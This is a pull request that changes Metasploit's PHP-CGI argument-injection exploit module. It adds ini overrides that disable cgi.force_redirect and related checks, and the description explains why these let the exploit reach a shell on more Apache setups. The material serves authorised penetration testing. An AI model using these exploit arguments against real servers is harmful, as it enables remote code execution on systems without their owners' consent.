### PR TITLE
Make php_cgi_arg_injection work in certain environnement

### DIFF
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
         create_arg("-d",'disable_functions=""'),
         create_arg("-d","open_basedir=none"),
         create_arg("-d","auto_prepend_file=php://input"),
-        create_arg("-d", "cgi.force_redirect=0"),
+        create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
         create_arg("-d", "cgi.redirect_status_env=0"),
         rand_opt_equiv("-n")
       ]

--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -114,6 +114,8 @@ class MetasploitModule < Msf::Exploit::Remote
         create_arg("-d",'disable_functions=""'),
         create_arg("-d","open_basedir=none"),
         create_arg("-d","auto_prepend_file=php://input"),
+        create_arg("-d", "cgi.force_redirect=0"),
+        create_arg("-d", "cgi.redirect_status_env=0"),
         rand_opt_equiv("-n")
       ]
 

--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -116,6 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
         create_arg("-d","auto_prepend_file=php://input"),
         create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
         create_arg("-d", "cgi.redirect_status_env=0"),
+        create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
         rand_opt_equiv("-n")
       ]
 


### PR DESCRIPTION
This commit sets two more options to `0` in the payload:

- [cgi.force_redirect](https://secure.php.net/manual/en/ini.core.php#ini.cgi.force-redirect)
- [cgi.redirect_status_env](https://secure.php.net/manual/en/ini.core.php#ini.cgi.redirect-status-env)

The configuration directive `cgi.force_redirect` prevents anyone from calling PHP
directly with a URL like http://my.host/cgi-bin/php/secretdir/script.php.
Instead, PHP will only parse in this mode if it has gone through a web server redirect rule.

The string set in the configuration directive `cgi.redirect_status_env`
is the one that PHP will look for to know it's ok to continue its
execution. This might be use together with the previous configuration
option as a security measure.

Setting those variables to `0` is (as stated in the documentation) a
security issue, but it also make the exploit work on some Apache2 setup.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploits/multi/http/php_cgi_arg_injection.rb`
- [ ] Setup your apache2 in a weird way
- [ ] **Verify** that you get  shell
- [ ] **Verify** that [other]( https://www.vulnerability-lab.com/get_content.php?id=1562 ) [exploits](https://www.praetorian.com/blog/php-cgi-remote-command-execution-vulnerability-exploitation) are using those parameters

